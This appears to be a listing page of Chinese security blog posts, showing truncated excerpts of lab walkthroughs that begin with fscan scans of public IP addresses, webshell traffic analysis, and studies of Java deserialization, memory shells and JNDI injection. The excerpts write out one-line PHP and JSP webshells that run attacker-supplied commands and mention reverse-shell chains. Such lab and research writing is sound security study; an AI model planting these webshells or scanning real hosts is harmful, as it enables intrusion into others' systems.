春秋云境Delegationfsan扫 12345678910111213141516171819202122232425E:\Users\tiand>fscan -h 39.98.124.53┌──────────────────────────────────────────────┐│ ___ _ ││

春秋云境Certifyfsan扫 123456789101112131415161718192021222324252627E:\Users\tiand>fscan -h 39.99.131.86┌──────────────────────────────────────────────┐│ ___ _ ││

春秋云境Timefsan扫 123456789101112131415161718192021222324E:\Users\tiand>fscan -h 39.98.108.227┌──────────────────────────────────────────────┐│ ___ _ ││ / _ \

春秋云境Brute4Roadfsan扫 1234567891011121314151617181920212223242526272829E:\Users\tiand>fscan -h 39.99.148.252┌──────────────────────────────────────────────┐│ ___ _

应急之webshell管理器的流量分析（菜刀蚁剑哥斯拉冰蝎）菜刀服务端用一句话木马<?php eval($_POST['pass']);?> 客户端发送初始化代码让服务端执行 蚁剑服务端用一句话木马<?php eval($_POST['pass']);?> 除pass键，其他键的值前两位是随机字符填充，去掉base64解码就行 pass键类似

春秋云境Tsclientfsan扫出MSSQL密码 12345678910111213141516171819202122232425E:\Users\tiand>fscan -h 39.99.142.105┌──────────────────────────────────────────────┐│ ___ _

春秋云境Initialfscan扫出漏洞 1234567891011121314151617181920212223242526272829E:\>fscan -h 39.98.118.141┌──────────────────────────────────────────────┐│ ___ _ ││ /

非常基础的java反序列化，大概能知道java反射，类加载，urldns链基本就可以 因为题目不出网，23章提供跳板机反弹shell, 附加挑战只能用回显技术打 反弹shell调用链HashMap#readObject()->DogService#chainWagTail()->Dog#wagTail() exp1:12345678910111213141516171819202122

本文研究java内存马相关，环境：java 1.8 tomcat 9.0.95 本质跟python的一样还是改了一些对象的属性来实现 先不考虑回显 jsp中简单的一句话木马 1<%Runtime.getRuntime().exec(request.getParameter("cmd"));%> 需要文件落地，类似php 而Java可以动态添加组件来实现内存马 To

本文介绍jndi注入 jndi注入就是jndi loopup的参数可控，就跟命令注入类似 JNDI-Reference在JNDI服务中允许使用系统以外的对象，比如在某些目录服务中直接引用远程的Java对象，但遵循一些安全限制。 1234//className为远程加载时所使用的类名，如果本地找不到这个类名，就去远程加载//factory为工厂类名//factoryLocation为工厂类加载的地址